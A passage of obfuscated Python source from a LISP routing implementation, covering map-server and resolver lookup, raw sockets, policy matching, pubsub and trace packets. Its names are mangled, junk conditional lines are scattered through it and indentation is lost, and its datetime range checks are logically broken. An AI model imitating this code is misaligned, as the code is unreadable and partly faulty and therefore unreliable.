if 100 - 100: I1Ii111 + i11iIiiIii - IiII / I1ii11iIi11i / iII111i
if 56 - 56: iII111i
if 91 - 91: Oo0Ooo . I11i . I1ii11iIi11i
OoiIIi11 = [ ]
for ii1i in lisp_map_servers_list . values ( ) :
if ( self . dns_name != ii1i . dns_name ) : continue
oO0OO = ii1i . map_server . print_address_no_iid ( )
if ( oO0OO in oo0Oo0O0 ) : continue
OoiIIi11 . append ( ii1i )
if 60 - 60: i11iIiiIii - OOooOOo
for ii1i in OoiIIi11 : ii1i . delete_ms ( )
if 78 - 78: I1IiiI * ooOoO0o % iIii1I11I1II1 / I1ii11iIi11i
if 61 - 61: I1Ii111 . Ii1I + OoooooooOO
def insert_ms ( self ) :
o0Oo = self . ms_name + self . map_server . print_address ( )
lisp_map_servers_list [ o0Oo ] = self
if 98 - 98: OOooOOo . ooOoO0o . OoOoOO00 - I1Ii111 . i1IIi - iIii1I11I1II1
if 89 - 89: II111iiii * I1ii11iIi11i - I1IiiI
def delete_ms ( self ) :
o0Oo = self . ms_name + self . map_server . print_address ( )
if ( lisp_map_servers_list . has_key ( o0Oo ) == False ) : return
lisp_map_servers_list . pop ( o0Oo )
if 58 - 58: Ii1I / Oo0Ooo % IiII
if 33 - 33: II111iiii . OOooOOo % iIii1I11I1II1 - Oo0Ooo - OoOoOO00 % i11iIiiIii
if 60 - 60: iII111i . o0oOOo0O0Ooo
class lisp_interface ( ) :
def __init__ ( self , device ) :
self . interface_name = ""
self . device = device
self . instance_id = None
self . bridge_socket = None
self . raw_socket = None
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dynamic_eid_device = None
self . dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self . multi_tenant_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 56 - 56: I1ii11iIi11i
if 89 - 89: Oo0Ooo + I1ii11iIi11i * o0oOOo0O0Ooo * oO0o % O0 % OoO0O00
def add_interface ( self ) :
lisp_myinterfaces [ self . device ] = self
if 70 - 70: o0oOOo0O0Ooo + O0 % I1IiiI
if 56 - 56: Ii1I
def get_instance_id ( self ) :
return ( self . instance_id )
if 84 - 84: iII111i
if 21 - 21: i11iIiiIii
def get_socket ( self ) :
return ( self . raw_socket )
if 30 - 30: OoO0O00 + OoooooooOO
if 98 - 98: I1ii11iIi11i % I1IiiI
def get_bridge_socket ( self ) :
return ( self . bridge_socket )
if 9 - 9: o0oOOo0O0Ooo / I1Ii111 % i1IIi - OOooOOo % I1IiiI / I1ii11iIi11i
if 66 - 66: IiII
def does_dynamic_eid_match ( self , eid ) :
if ( self . dynamic_eid . is_null ( ) ) : return ( False )
return ( eid . is_more_specific ( self . dynamic_eid ) )
if 56 - 56: oO0o + OoooooooOO
if 75 - 75: O0 % Ii1I
def set_socket ( self , device ) :
OO0o0OO0 = socket . socket ( socket . AF_INET , socket . SOCK_RAW , socket . IPPROTO_RAW )
OO0o0OO0 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
try :
OO0o0OO0 . setsockopt ( socket . SOL_SOCKET , socket . SO_BINDTODEVICE , device )
except :
OO0o0OO0 . close ( )
OO0o0OO0 = None
if 47 - 47: OoooooooOO - OoooooooOO + OoO0O00 / iIii1I11I1II1
self . raw_socket = OO0o0OO0
if 23 - 23: iII111i / iIii1I11I1II1
if 5 - 5: O0
def set_bridge_socket ( self , device ) :
OO0o0OO0 = socket . socket ( socket . PF_PACKET , socket . SOCK_RAW )
try :
OO0o0OO0 = OO0o0OO0 . bind ( ( device , 0 ) )
self . bridge_socket = OO0o0OO0
except :
return
if 64 - 64: i1IIi * i1IIi . iII111i - O0 - oO0o % OoooooooOO
if 14 - 14: Ii1I % OoO0O00 % I1Ii111 * O0
if 8 - 8: I1IiiI - i11iIiiIii * I1IiiI
if 6 - 6: O0 - OoOoOO00 - i11iIiiIii / iII111i
class lisp_datetime ( ) :
def __init__ ( self , datetime_str ) :
self . datetime_name = datetime_str
self . datetime = None
self . parse_datetime ( )
if 63 - 63: OOooOOo
if 84 - 84: i11iIiiIii * iIii1I11I1II1 % I11i % iII111i + OoooooooOO . o0oOOo0O0Ooo
def valid_datetime ( self ) :
OOIiII = self . datetime_name
if ( OOIiII . find ( ":" ) == - 1 ) : return ( False )
if ( OOIiII . find ( "-" ) == - 1 ) : return ( False )
I1I1iiiI , OO0I1i1II1I , Oo0OOoooo0 , time = OOIiII [ 0 : 4 ] , OOIiII [ 5 : 7 ] , OOIiII [ 8 : 10 ] , OOIiII [ 11 : : ]
if 73 - 73: Ii1I . IiII % IiII
if ( ( I1I1iiiI + OO0I1i1II1I + Oo0OOoooo0 ) . isdigit ( ) == False ) : return ( False )
if ( OO0I1i1II1I < "01" and OO0I1i1II1I > "12" ) : return ( False )
if ( Oo0OOoooo0 < "01" and Oo0OOoooo0 > "31" ) : return ( False )
if 56 - 56: I1Ii111 + iII111i + iII111i
OOoOoOOo0O , iIi1i11iii1iI , OOoO = time . split ( ":" )
if 33 - 33: i11iIiiIii + I1Ii111 % I1ii11iIi11i - I1Ii111 * OoO0O00
if ( ( OOoOoOOo0O + iIi1i11iii1iI + OOoO ) . isdigit ( ) == False ) : return ( False )
if ( OOoOoOOo0O < "00" and OOoOoOOo0O > "23" ) : return ( False )
if ( iIi1i11iii1iI < "00" and iIi1i11iii1iI > "59" ) : return ( False )
if ( OOoO < "00" and OOoO > "59" ) : return ( False )
return ( True )
if 1 - 1: II111iiii / I1IiiI + II111iiii % II111iiii - I1Ii111
if 24 - 24: I11i / Oo0Ooo / i1IIi + IiII
def parse_datetime ( self ) :
I1i1ii1I = self . datetime_name
I1i1ii1I = I1i1ii1I . replace ( "-" , "" )
I1i1ii1I = I1i1ii1I . replace ( ":" , "" )
self . datetime = int ( I1i1ii1I )
if 31 - 31: I1Ii111
if 91 - 91: oO0o * OoOoOO00 + O0 % Oo0Ooo
def now ( self ) :
i1 = datetime . datetime . now ( ) . strftime ( "%Y-%m-%d-%H:%M:%S" )
i1 = lisp_datetime ( i1 )
return ( i1 )
if 62 - 62: iIii1I11I1II1 - i11iIiiIii % iIii1I11I1II1 . ooOoO0o / OOooOOo * OoOoOO00
if 45 - 45: OOooOOo - OOooOOo % iII111i - IiII . O0
def print_datetime ( self ) :
return ( self . datetime_name )
if 6 - 6: iIii1I11I1II1 * II111iiii / O0 % IiII - I1Ii111
if 64 - 64: ooOoO0o
def future ( self ) :
return ( self . datetime > self . now ( ) . datetime )
if 28 - 28: i11iIiiIii - IiII * I1ii11iIi11i + IiII * iII111i
if 75 - 75: o0oOOo0O0Ooo * OoOoOO00 % I1ii11iIi11i + OOooOOo . II111iiii
def past ( self ) :
return ( self . future ( ) == False )
if 12 - 12: ooOoO0o
if 83 - 83: I1Ii111 % ooOoO0o + OoooooooOO
def now_in_range ( self , upper ) :
return ( self . past ( ) and upper . future ( ) )
if 50 - 50: i11iIiiIii % I1IiiI * iII111i / Ii1I
if 12 - 12: iII111i / OoO0O00 - II111iiii + Oo0Ooo
def this_year ( self ) :
ooO0 = str ( self . now ( ) . datetime ) [ 0 : 4 ]
i1 = str ( self . datetime ) [ 0 : 4 ]
return ( i1 == ooO0 )
if 78 - 78: OoOoOO00 / IiII
if 92 - 92: OoOoOO00 / I11i / I1Ii111
def this_month ( self ) :
ooO0 = str ( self . now ( ) . datetime ) [ 0 : 6 ]
i1 = str ( self . datetime ) [ 0 : 6 ]
return ( i1 == ooO0 )
if 2 - 2: IiII - iIii1I11I1II1
if 54 - 54: i11iIiiIii . Ii1I % I1IiiI . I1Ii111 . OoooooooOO
def today ( self ) :
ooO0 = str ( self . now ( ) . datetime ) [ 0 : 8 ]
i1 = str ( self . datetime ) [ 0 : 8 ]
return ( i1 == ooO0 )
if 49 - 49: OOooOOo % I11i - OOooOOo + Ii1I . I1ii11iIi11i + ooOoO0o
if 15 - 15: i11iIiiIii
if 85 - 85: I1Ii111 + iII111i - oO0o
if 59 - 59: IiII . oO0o / i11iIiiIii . I1Ii111
if 64 - 64: OoOoOO00
if 20 - 20: OoOoOO00 / O0 * OOooOOo % I11i + OoO0O00 + o0oOOo0O0Ooo
class lisp_policy_match ( ) :
def __init__ ( self ) :
self . source_eid = None
self . dest_eid = None
self . source_rloc = None
self . dest_rloc = None
self . rloc_record_name = None
self . geo_name = None
self . elp_name = None
self . rle_name = None
self . json_name = None
self . datetime_lower = None
self . datetime_upper = None
if 51 - 51: Ii1I - OoOoOO00 / i11iIiiIii + O0
if 71 - 71: ooOoO0o
class lisp_policy ( ) :
def __init__ ( self , policy_name ) :
self . policy_name = policy_name
self . match_clauses = [ ]
self . set_action = None
self . set_record_ttl = None
self . set_source_eid = None
self . set_dest_eid = None
self . set_rloc_address = None
self . set_rloc_record_name = None
self . set_geo_name = None
self . set_elp_name = None
self . set_rle_name = None
self . set_json_name = None
if 35 - 35: OoOoOO00
if 55 - 55: iII111i - o0oOOo0O0Ooo + IiII * II111iiii
def match_policy_map_request ( self , mr , srloc ) :
for i1iI11i in self . match_clauses :
IiI1i1i1 = i1iI11i . source_eid
oO0Oo0O = mr . source_eid
if ( IiI1i1i1 and oO0Oo0O and oO0Oo0O . is_more_specific ( IiI1i1i1 ) == False ) : continue
if 6 - 6: I1Ii111 / i1IIi / IiII . o0oOOo0O0Ooo
IiI1i1i1 = i1iI11i . dest_eid
oO0Oo0O = mr . target_eid
if ( IiI1i1i1 and oO0Oo0O and oO0Oo0O . is_more_specific ( IiI1i1i1 ) == False ) : continue
if 69 - 69: ooOoO0o - OoOoOO00 . I1IiiI . I11i + OoOoOO00 / i11iIiiIii
IiI1i1i1 = i1iI11i . source_rloc
oO0Oo0O = srloc
if ( IiI1i1i1 and oO0Oo0O and oO0Oo0O . is_more_specific ( IiI1i1i1 ) == False ) : continue
IIi1I1 = i1iI11i . datetime_lower
IIo0 = i1iI11i . datetime_upper
if ( IIi1I1 and IIo0 and IIi1I1 . now_in_range ( IIo0 ) == False ) : continue
return ( True )
if 21 - 21: IiII + i11iIiiIii / ooOoO0o . I1ii11iIi11i % o0oOOo0O0Ooo
return ( False )
if 46 - 46: II111iiii
if 93 - 93: Ii1I * iII111i / OoOoOO00
def set_policy_map_reply ( self ) :
oo0oo000 = ( self . set_rloc_address == None and
self . set_rloc_record_name == None and self . set_geo_name == None and
self . set_elp_name == None and self . set_rle_name == None )
if ( oo0oo000 ) : return ( None )
if 11 - 11: I1IiiI % OoOoOO00 / OoO0O00 % OoO0O00 / OoO0O00 * IiII
I1II = lisp_rloc ( )
if ( self . set_rloc_address ) :
I1II . rloc . copy_address ( self . set_rloc_address )
o0o00O0oOooO0 = I1II . rloc . print_address_no_iid ( )
lprint ( "Policy set-rloc-address to {}" . format ( o0o00O0oOooO0 ) )
if 37 - 37: oO0o / iII111i
if ( self . set_rloc_record_name ) :
I1II . rloc_name = self . set_rloc_record_name
II1 = blue ( I1II . rloc_name , False )
lprint ( "Policy set-rloc-record-name to {}" . format ( II1 ) )
if 58 - 58: OoO0O00 / OoOoOO00 - Oo0Ooo + OoOoOO00
if ( self . set_geo_name ) :
I1II . geo_name = self . set_geo_name
II1 = I1II . geo_name
IiI1I1iI11 = "" if lisp_geo_list . has_key ( II1 ) else "(not configured)"
if 82 - 82: OOooOOo
lprint ( "Policy set-geo-name '{}' {}" . format ( II1 , IiI1I1iI11 ) )
if 96 - 96: oO0o % ooOoO0o / i1IIi - I11i - Ii1I . o0oOOo0O0Ooo
if ( self . set_elp_name ) :
I1II . elp_name = self . set_elp_name
II1 = I1II . elp_name
IiI1I1iI11 = "" if lisp_elp_list . has_key ( II1 ) else "(not configured)"
if 58 - 58: OoooooooOO % iII111i . O0
lprint ( "Policy set-elp-name '{}' {}" . format ( II1 , IiI1I1iI11 ) )
if 93 - 93: I1Ii111
if ( self . set_rle_name ) :
I1II . rle_name = self . set_rle_name
II1 = I1II . rle_name
IiI1I1iI11 = "" if lisp_rle_list . has_key ( II1 ) else "(not configured)"
if 3 - 3: OoO0O00 / IiII - oO0o / oO0o
lprint ( "Policy set-rle-name '{}' {}" . format ( II1 , IiI1I1iI11 ) )
if 50 - 50: II111iiii + OoOoOO00
if ( self . set_json_name ) :
I1II . json_name = self . set_json_name
II1 = I1II . json_name
IiI1I1iI11 = "" if lisp_json_list . has_key ( II1 ) else "(not configured)"
if 17 - 17: ooOoO0o + I1ii11iIi11i
lprint ( "Policy set-json-name '{}' {}" . format ( II1 , IiI1I1iI11 ) )
if 34 - 34: Ii1I / II111iiii + OoOoOO00 . II111iiii + OoooooooOO * o0oOOo0O0Ooo
return ( I1II )
if 48 - 48: O0
if 99 - 99: II111iiii * oO0o / I1ii11iIi11i - i1IIi
def save_policy ( self ) :
lisp_policies [ self . policy_name ] = self
if 84 - 84: i11iIiiIii . OoooooooOO
if 69 - 69: I1Ii111 * II111iiii % I1Ii111 * i11iIiiIii . ooOoO0o / Oo0Ooo
if 5 - 5: Ii1I
class lisp_pubsub ( ) :
def __init__ ( self , itr , port , nonce , ttl , xtr_id ) :
self . itr = itr
self . port = port
self . nonce = nonce
self . uptime = lisp_get_timestamp ( )
self . ttl = ttl
self . xtr_id = xtr_id
self . map_notify_count = 0
if 19 - 19: oO0o
if 61 - 61: OoOoOO00 + iIii1I11I1II1 / I1ii11iIi11i - i1IIi
def add ( self , eid_prefix ) :
Oo0o0 = self . ttl
iiI1I1IIi = eid_prefix . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( iiI1I1IIi ) == False ) :
lisp_pubsub_cache [ iiI1I1IIi ] = { }
if 11 - 11: oO0o * o0oOOo0O0Ooo . I1IiiI
I1IIiI = lisp_pubsub_cache [ iiI1I1IIi ]
if 12 - 12: I1IiiI % OoO0O00 / I1Ii111 / O0 % o0oOOo0O0Ooo
iI1I1 = "Add"
if ( I1IIiI . has_key ( self . xtr_id ) ) :
iI1I1 = "Replace"
del ( I1IIiI [ self . xtr_id ] )
if 61 - 61: i1IIi / Ii1I . OoOoOO00 + i11iIiiIii
I1IIiI [ self . xtr_id ] = self
if 69 - 69: i11iIiiIii - iIii1I11I1II1
iiI1I1IIi = green ( iiI1I1IIi , False )
OooO0OO0 = red ( self . itr . print_address_no_iid ( ) , False )
IIiiII11i11I = "0x" + lisp_hex_string ( self . xtr_id )
lprint ( "{} pubsub state {} for {}, xtr-id: {}, ttl {}" . format ( iI1I1 , iiI1I1IIi ,
OooO0OO0 , IIiiII11i11I , Oo0o0 ) )
if 40 - 40: I1IiiI / oO0o + ooOoO0o
if 100 - 100: OoOoOO00 % iII111i * ooOoO0o . O0
def delete ( self , eid_prefix ) :
iiI1I1IIi = eid_prefix . print_prefix ( )
OooO0OO0 = red ( self . itr . print_address_no_iid ( ) , False )
IIiiII11i11I = "0x" + lisp_hex_string ( self . xtr_id )
if ( lisp_pubsub_cache . has_key ( iiI1I1IIi ) ) :
I1IIiI = lisp_pubsub_cache [ iiI1I1IIi ]
if ( I1IIiI . has_key ( self . xtr_id ) ) :
I1IIiI . pop ( self . xtr_id )
lprint ( "Remove pubsub state {} for {}, xtr-id: {}" . format ( iiI1I1IIi ,
OooO0OO0 , IIiiII11i11I ) )
if 37 - 37: I1ii11iIi11i
if 24 - 24: O0 . I1Ii111 * i11iIiiIii
if 84 - 84: ooOoO0o / I1ii11iIi11i - o0oOOo0O0Ooo . OoooooooOO * iIii1I11I1II1
if 16 - 16: I11i % O0
if 56 - 56: Ii1I * OoOoOO00 . i1IIi
if 15 - 15: I1Ii111
if 64 - 64: OOooOOo * Oo0Ooo
if 96 - 96: Oo0Ooo / I1ii11iIi11i * iIii1I11I1II1 / iII111i
if 18 - 18: I1Ii111
if 29 - 29: i1IIi - I1IiiI / i1IIi
if 64 - 64: IiII
if 69 - 69: OOooOOo . I1IiiI
if 11 - 11: I1Ii111 * I1IiiI - I1Ii111 / iII111i
if 22 - 22: iII111i % I11i % O0 - I11i
if 71 - 71: I1Ii111 / II111iiii - OoooooooOO % i1IIi + OoOoOO00 % OoooooooOO
if 52 - 52: Ii1I . OoOoOO00 / o0oOOo0O0Ooo / iII111i
if 83 - 83: OoO0O00 - Oo0Ooo + I1Ii111 . I1IiiI
if 78 - 78: I11i / ooOoO0o . OoOoOO00 * i1IIi
if 15 - 15: i1IIi . II111iiii * OoOoOO00 / Oo0Ooo
if 99 - 99: iII111i - o0oOOo0O0Ooo / O0
if 97 - 97: iIii1I11I1II1 * I1Ii111
if 39 - 39: I1Ii111 . II111iiii
class lisp_trace ( ) :
def __init__ ( self ) :
self . nonce = lisp_get_control_nonce ( )
self . packet_json = [ ]
self . local_rloc = None
self . local_port = None
self . lisp_socket = None
if 94 - 94: OoO0O00 - OoO0O00 + iIii1I11I1II1 + O0 * oO0o
if 9 - 9: Ii1I * Oo0Ooo / oO0o / Ii1I
def print_trace ( self ) :
i1i1ii = self . packet_json
lprint ( "LISP-Trace JSON: '{}'" . format ( i1i1ii ) )
if 34 - 34: I1IiiI
if 56 - 56: Ii1I
def encode ( self ) :
i1OOoO0OO0oO = socket . htonl ( 0x90000000 )
IiiiIi1iiii11 = struct . pack ( "II" , i1OOoO0OO0oO , 0 )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
IiiiIi1iiii11 += json . dumps ( self . packet_json )
return ( IiiiIi1iiii11 )
if 71 - 71: O0 / i1IIi
if 20 - 20: OOooOOo . iIii1I11I1II1 - I1Ii111 . i1IIi
def decode ( self , packet ) :
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( False )
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO )
if ( ( i1OOoO0OO0oO & 0xff000000 ) != 0x90000000 ) : return ( False )
if 82 - 82: oO0o * i11iIiiIii % o0oOOo0O0Ooo % IiII - I11i - OoO0O00
if ( len ( packet ) < IiIii1i ) : return ( False )
o0o00O0oOooO0 = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
if 24 - 24: oO0o . II111iiii + OoO0O00 * I1ii11iIi11i / oO0o
o0o00O0oOooO0 = socket . ntohl ( o0o00O0oOooO0 )
o0OO0O0 = o0o00O0oOooO0 >> 24
iIIi1i1i1 = ( o0o00O0oOooO0 >> 16 ) & 0xff
iI11i1i1ii = ( o0o00O0oOooO0 >> 8 ) & 0xff
Oo0o0OoO00 = o0o00O0oOooO0 & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( o0OO0O0 , iIIi1i1i1 , iI11i1i1ii , Oo0o0OoO00 )
self . local_port = str ( i1OOoO0OO0oO & 0xffff )
if 94 - 94: Oo0Ooo
O0O00Oo = "Q"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( False )
self . nonce = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
if ( len ( packet ) == 0 ) : return ( True )
if 33 - 33: oO0o / ooOoO0o
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
if 92 - 92: O0 . Oo0Ooo - Ii1I * I1IiiI * Oo0Ooo * iII111i
return ( True )
if 78 - 78: Ii1I * iIii1I11I1II1 - Ii1I - I1ii11iIi11i * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo
def myeid ( self , eid ) :
return ( lisp_is_myeid ( eid ) )
if 1 - 1: OoooooooOO / i11iIiiIii . o0oOOo0O0Ooo
if 78 - 78: OOooOOo * O0 * II111iiii % OoOoOO00
def return_to_sender ( self , lisp_socket , rts_rloc , packet ) :
I1II , Oo0o = self . rtr_cache_nat_trace_find ( rts_rloc )
if ( I1II == None ) :
I1II , Oo0o = rts_rloc . split ( ":" )
Oo0o = int ( Oo0o )
lprint ( "Send LISP-Trace to address {}:{}" . format ( I1II , Oo0o ) )
else :
lprint ( "Send LISP-Trace to translated address {}:{}" . format ( I1II ,
Oo0o ) )
if 12 - 12: Oo0Ooo . o0oOOo0O0Ooo - i1IIi - oO0o % IiII . I11i
if 17 - 17: i1IIi % OoO0O00 + i11iIiiIii % I1Ii111 * ooOoO0o . I1ii11iIi11i
if ( lisp_socket == None ) :
OO0o0OO0 = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
OO0o0OO0 . bind ( ( "0.0.0.0" , LISP_TRACE_PORT ) )
OO0o0OO0 . sendto ( packet , ( I1II , Oo0o ) )
OO0o0OO0 . close ( )
else :
lisp_socket . sendto ( packet , ( I1II , Oo0o ) )
if 64 - 64: O0 - iII111i
if 82 - 82: O0
if 37 - 37: I1Ii111
def packet_length ( self ) :
oOoO0OOO00O = 8 ; O0oOo0O0O = 4 + 4 + 8
return ( oOoO0OOO00O + O0oOo0O0O + len ( json . dumps ( self . packet_json ) ) )
if 68 - 68: OoO0O00 * OOooOOo * ooOoO0o / ooOoO0o . O0 + I11i
if 79 - 79: iIii1I11I1II1 / I1IiiI / OoooooooOO % IiII . OoOoOO00
def rtr_cache_nat_trace ( self , translated_rloc , translated_port ) :
o0Oo = self . local_rloc + ":" + self . local_port
Oo00OO0OO = ( translated_rloc , translated_port )
lisp_rtr_nat_trace_cache [ o0Oo ] = Oo00OO0OO
lprint ( "Cache NAT Trace addresses {} -> {}" . format ( o0Oo , Oo00OO0OO ) )
if 70 - 70: OoOoOO00 + OoooooooOO + iIii1I11I1II1 / Ii1I
if 92 - 92: II111iiii - IiII / II111iiii
def rtr_cache_nat_trace_find ( self , local_rloc_and_port ) :
o0Oo = local_rloc_and_port
try : Oo00OO0OO = lisp_rtr_nat_trace_cache [ o0Oo ]
except : Oo00OO0OO = ( None , None )
return ( Oo00OO0OO )
if 23 - 23: Ii1I * II111iiii - I1ii11iIi11i
if 86 - 86: ooOoO0o . OoO0O00 + I1Ii111 - I11i % i11iIiiIii / OoOoOO00
if 47 - 47: IiII
if 32 - 32: i1IIi / iIii1I11I1II1 / iII111i
if 11 - 11: I1ii11iIi11i - iIii1I11I1II1
if 15 - 15: o0oOOo0O0Ooo + OoooooooOO
if 68 - 68: ooOoO0o / I1Ii111 * OoO0O00 + ooOoO0o / iIii1I11I1II1 . iII111i
if 91 - 91: OoO0O00
if 8 - 8: oO0o
if 96 - 96: IiII
if 37 - 37: Ii1I % i11iIiiIii + iIii1I11I1II1 % Oo0Ooo - iIii1I11I1II1
def lisp_get_map_server ( address ) :
for ii1i in lisp_map_servers_list . values ( ) :
if ( ii1i . map_server . is_exact_match ( address ) ) : return ( ii1i )
if 26 - 26: o0oOOo0O0Ooo . i1IIi
return ( None )
if 62 - 62: IiII * I1ii11iIi11i % iIii1I11I1II1 / II111iiii - OoO0O00
if 52 - 52: iII111i . I11i - I11i + oO0o + iIii1I11I1II1
if 83 - 83: I11i * iIii1I11I1II1 + OoOoOO00
if 81 - 81: ooOoO0o * OOooOOo / OoO0O00 + I1ii11iIi11i % I1Ii111
if 37 - 37: i11iIiiIii - OoooooooOO - OoOoOO00 * oO0o / Ii1I
if 100 - 100: II111iiii / Oo0Ooo / iII111i / OOooOOo
if 100 - 100: iIii1I11I1II1
def lisp_get_any_map_server ( ) :
for ii1i in lisp_map_servers_list . values ( ) : return ( ii1i )
return ( None )
if 50 - 50: I1Ii111 / ooOoO0o * I11i
if 53 - 53: II111iiii . IiII
if 5 - 5: i1IIi % IiII
if 16 - 16: ooOoO0o - iII111i % Ii1I . OoOoOO00
if 56 - 56: i11iIiiIii % i11iIiiIii % OoooooooOO . Ii1I . iII111i + I11i
if 64 - 64: O0
if 37 - 37: o0oOOo0O0Ooo / O0
if 58 - 58: I1Ii111 + OoooooooOO + iIii1I11I1II1
if 13 - 13: o0oOOo0O0Ooo . I11i / O0
if 39 - 39: I11i + oO0o + ooOoO0o % ooOoO0o - I1IiiI % Oo0Ooo
def lisp_get_map_resolver ( address , eid ) :
if ( address != None ) :
o0o00O0oOooO0 = address . print_address ( )
oOO00O0oooo00 = None
for o0Oo in lisp_map_resolvers_list :
if ( o0Oo . find ( o0o00O0oOooO0 ) == - 1 ) : continue
oOO00O0oooo00 = lisp_map_resolvers_list [ o0Oo ]
if 9 - 9: IiII / iII111i * II111iiii + O0 % Oo0Ooo / i1IIi
return ( oOO00O0oooo00 )
if 45 - 45: OoOoOO00 % i11iIiiIii . I1IiiI - O0 * i1IIi - I1IiiI
if 48 - 48: IiII / iIii1I11I1II1
if 20 - 20: oO0o / OoooooooOO
if 95 - 95: Oo0Ooo . i11iIiiIii
if 50 - 50: iII111i . i11iIiiIii - i1IIi
if 24 - 24: i11iIiiIii % iII111i . oO0o
if 44 - 44: II111iiii - OoO0O00 + i11iIiiIii
if ( eid == "" ) :
IIi11i1iIi = ""
elif ( eid == None ) :
IIi11i1iIi = "all"
else :
Oooo00oo = lisp_db_for_lookups . lookup_cache ( eid , False )
IIi11i1iIi = "all" if Oooo00oo == None else Oooo00oo . use_mr_name
if 62 - 62: oO0o - I1ii11iIi11i
if 16 - 16: I1IiiI . OoO0O00 * Ii1I / oO0o
i1I1iIiii = None
for oOO00O0oooo00 in lisp_map_resolvers_list . values ( ) :
if ( IIi11i1iIi == "" ) : return ( oOO00O0oooo00 )
if ( oOO00O0oooo00 . mr_name != IIi11i1iIi ) : continue
if ( i1I1iIiii == None or oOO00O0oooo00 . last_used < i1I1iIiii . last_used ) : i1I1iIiii = oOO00O0oooo00
if 65 - 65: ooOoO0o + I1ii11iIi11i * I1Ii111 . i1IIi * i1IIi
return ( i1I1iIiii )
if 33 - 33: II111iiii - OoooooooOO / II111iiii % Oo0Ooo / o0oOOo0O0Ooo
if 41 - 41: I1Ii111 / IiII % OoO0O00 - iIii1I11I1II1
if 98 - 98: OoOoOO00 + i11iIiiIii - iII111i + II111iiii
if 10 - 10: ooOoO0o * i11iIiiIii . o0oOOo0O0Ooo % ooOoO0o
if 14 - 14: i11iIiiIii . o0oOOo0O0Ooo % OoooooooOO
if 15 - 15: I11i - OoOoOO00 . OoOoOO00 * iII111i - Ii1I . i11iIiiIii
if 68 - 68: iII111i
if 68 - 68: I1Ii111 - OoO0O00 % OoO0O00 % OOooOOo - OoO0O00
def lisp_get_decent_map_resolver ( eid ) :
ooo = lisp_get_decent_index ( eid )
iiIiII = str ( ooo ) + "." + lisp_decent_dns_suffix
if 7 - 7: Ii1I . o0oOOo0O0Ooo * OoooooooOO - Ii1I * II111iiii % I1Ii111
lprint ( "Use LISP-Decent map-resolver {} for EID {}" . format ( bold ( iiIiII , False ) , eid . print_prefix ( ) ) )
if 82 - 82: OoOoOO00 - OoOoOO00 + iIii1I11I1II1 + o0oOOo0O0Ooo + IiII - o0oOOo0O0Ooo
if 65 - 65: I1Ii111 + OOooOOo
i1I1iIiii = None
for oOO00O0oooo00 in lisp_map_resolvers_list . values ( ) :
if ( iiIiII != oOO00O0oooo00 . dns_name ) : continue
if ( i1I1iIiii == None or oOO00O0oooo00 . last_used < i1I1iIiii . last_used ) : i1I1iIiii = oOO00O0oooo00
if 97 - 97: oO0o % OoOoOO00 * oO0o % II111iiii + iIii1I11I1II1
return ( i1I1iIiii )
if 11 - 11: ooOoO0o . o0oOOo0O0Ooo
if 94 - 94: ooOoO0o . oO0o * OoooooooOO % oO0o
if 77 - 77: ooOoO0o % I1IiiI
if 26 - 26: o0oOOo0O0Ooo
if 72 - 72: I1IiiI
if 90 - 90: ooOoO0o
if 67 - 67: iIii1I11I1II1 + i1IIi * I1IiiI * OoooooooOO
def lisp_ipv4_input ( packet ) :
if 23 - 23: IiII
if 32 - 32: OoOoOO00 - iII111i % oO0o / I1ii11iIi11i - o0oOOo0O0Ooo
if 52 - 52: Ii1I / OoooooooOO % i11iIiiIii + iII111i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / oO0o + iII111i * I1ii11iIi11i - o0oOOo0O0Ooo
if ( ord ( packet [ 9 ] ) == 2 ) : return ( [ True , packet ] )
if 70 - 70: O0 / I1ii11iIi11i + ooOoO0o . OoO0O00 - OoO0O00 / i11iIiiIii
if 1 - 1: iIii1I11I1II1 % I1ii11iIi11i
if 49 - 49: iII111i + o0oOOo0O0Ooo % I1ii11iIi11i . O0 % OoooooooOO . o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii - i1IIi * o0oOOo0O0Ooo / OoOoOO00 % Oo0Ooo
oO0oOoo0O = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( oO0oOoo0O == 0 ) :
dprint ( "Packet arrived with checksum of 0!" )
else :
packet = lisp_ip_checksum ( packet )
oO0oOoo0O = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( oO0oOoo0O != 0 ) :
dprint ( "IPv4 header checksum failed for inner header" )
packet = lisp_format_packet ( packet [ 0 : 20 ] )
dprint ( "Packet header: {}" . format ( packet ) )
return ( [ False , None ] )
if 65 - 65: OoooooooOO + iII111i - i11iIiiIii - IiII + oO0o
if 67 - 67: i1IIi * I1Ii111 * O0
if 16 - 16: OoO0O00 + iII111i + i1IIi + I1ii11iIi11i - I1IiiI
if 88 - 88: oO0o % iII111i + I1ii11iIi11i - II111iiii . I11i
if 18 - 18: I1ii11iIi11i - i1IIi - IiII * II111iiii % I1Ii111 . II111iiii
if 80 - 80: oO0o + OoO0O00 + o0oOOo0O0Ooo . OoOoOO00
if 75 - 75: i11iIiiIii
Oo0o0 = struct . unpack ( "B" , packet [ 8 : 9 ] ) [ 0 ]
if ( Oo0o0 == 0 ) :
dprint ( "IPv4 packet arrived with ttl 0, packet discarded" )
return ( [ False , None ] )
elif ( Oo0o0 == 1 ) :
